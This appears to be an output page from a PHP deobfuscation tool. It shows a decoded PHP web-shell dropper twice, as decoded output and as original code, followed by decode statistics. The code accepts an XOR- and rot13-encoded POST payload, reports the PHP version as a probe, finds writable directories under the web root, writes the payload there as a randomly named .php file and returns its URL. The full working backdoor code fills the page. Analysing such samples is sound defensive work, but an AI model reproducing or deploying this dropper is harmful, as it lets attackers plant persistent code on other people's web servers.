Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php foreach ($_POST as $postKey => $value) { if (strlen($postKey) == 16) { ..
Decoded Output download
<?php
foreach ($_POST as $postKey => $value) {
if (strlen($postKey) == 16) {
$value = str_split(rawurldecode(str_rot13($value)));
$postKey = array_slice(str_split(str_repeat($postKey, count($value) / 16 + 1)), 0, count($value));
function aLZUGIt($xZSaZ, $yCDgbEzFJ, $postKey)
{
$PsKak = '6ab3094c-0ee5-4be3-9705-e37dbc34cf22';
return $xZSaZ ^ $PsKak[$yCDgbEzFJ % strlen($PsKak)] ^ $postKey;
}
$value = implode("", array_map("aLZUGIt", array_values($value), array_keys($value), array_values($postKey)));
$value = @unserialize($value);
if (@is_array($value)) {
$QrVJyj = array_keys($value);
$value = $value[$QrVJyj[0]];
if ($value === $QrVJyj[0]) {
echo @serialize(array('php' => @phpversion()));
exit;
} else {
function kThHoqy($eRLQxBjiir)
{
static $USfvhVEExS = array();
$eRLQxBjiEVujYAIRS = glob($eRLQxBjiir . '/*', GLOB_ONLYDIR);
if (count($eRLQxBjiEVujYAIRS) > 0) {
foreach ($eRLQxBjiEVujYAIRS as $eRLQxBji) {
if (@is_writable($eRLQxBji)) {
$USfvhVEExS[] = $eRLQxBji;
}
}
}
foreach ($eRLQxBjiEVujYAIRS as $eRLQxBjiir) {
kThHoqy($eRLQxBjiir);
}
return $USfvhVEExS;
}
$GStmFno = $_SERVER['DOCUMENT_ROOT'];
$eRLQxBjiEVujYAIRS = kThHoqy($GStmFno);
$QrVJyj = array_rand($eRLQxBjiEVujYAIRS);
$OJQzi = $eRLQxBjiEVujYAIRS[$QrVJyj] . '/' . substr(md5(time()), 0, 8) . '.php';
@file_put_contents($OJQzi, $value);
echo 'http://' . $_SERVER['HTTP_HOST'] . substr($OJQzi, strlen($GStmFno));
exit;
}
}
}
}
?>Did this file decode correctly?
Original Code
<?php
foreach ($_POST as $postKey => $value) {
if (strlen($postKey) == 16) {
$value = str_split(rawurldecode(str_rot13($value)));
$postKey = array_slice(str_split(str_repeat($postKey, count($value) / 16 + 1)), 0, count($value));
function aLZUGIt($xZSaZ, $yCDgbEzFJ, $postKey)
{
$PsKak = '6ab3094c-0ee5-4be3-9705-e37dbc34cf22';
return $xZSaZ ^ $PsKak[$yCDgbEzFJ % strlen($PsKak)] ^ $postKey;
}
$value = implode("", array_map("aLZUGIt", array_values($value), array_keys($value), array_values($postKey)));
$value = @unserialize($value);
if (@is_array($value)) {
$QrVJyj = array_keys($value);
$value = $value[$QrVJyj[0]];
if ($value === $QrVJyj[0]) {
echo @serialize(array('php' => @phpversion()));
exit;
} else {
function kThHoqy($eRLQxBjiir)
{
static $USfvhVEExS = array();
$eRLQxBjiEVujYAIRS = glob($eRLQxBjiir . '/*', GLOB_ONLYDIR);
if (count($eRLQxBjiEVujYAIRS) > 0) {
foreach ($eRLQxBjiEVujYAIRS as $eRLQxBji) {
if (@is_writable($eRLQxBji)) {
$USfvhVEExS[] = $eRLQxBji;
}
}
}
foreach ($eRLQxBjiEVujYAIRS as $eRLQxBjiir) {
kThHoqy($eRLQxBjiir);
}
return $USfvhVEExS;
}
$GStmFno = $_SERVER['DOCUMENT_ROOT'];
$eRLQxBjiEVujYAIRS = kThHoqy($GStmFno);
$QrVJyj = array_rand($eRLQxBjiEVujYAIRS);
$OJQzi = $eRLQxBjiEVujYAIRS[$QrVJyj] . '/' . substr(md5(time()), 0, 8) . '.php';
@file_put_contents($OJQzi, $value);
echo 'http://' . $_SERVER['HTTP_HOST'] . substr($OJQzi, strlen($GStmFno));
exit;
}
}
}
}
Function Calls
| None |
Stats
| MD5 | 12a0bce4a4d2c74c7fcd9831a315b677 |
| Eval Count | 0 |
| Decode Time | 62 ms |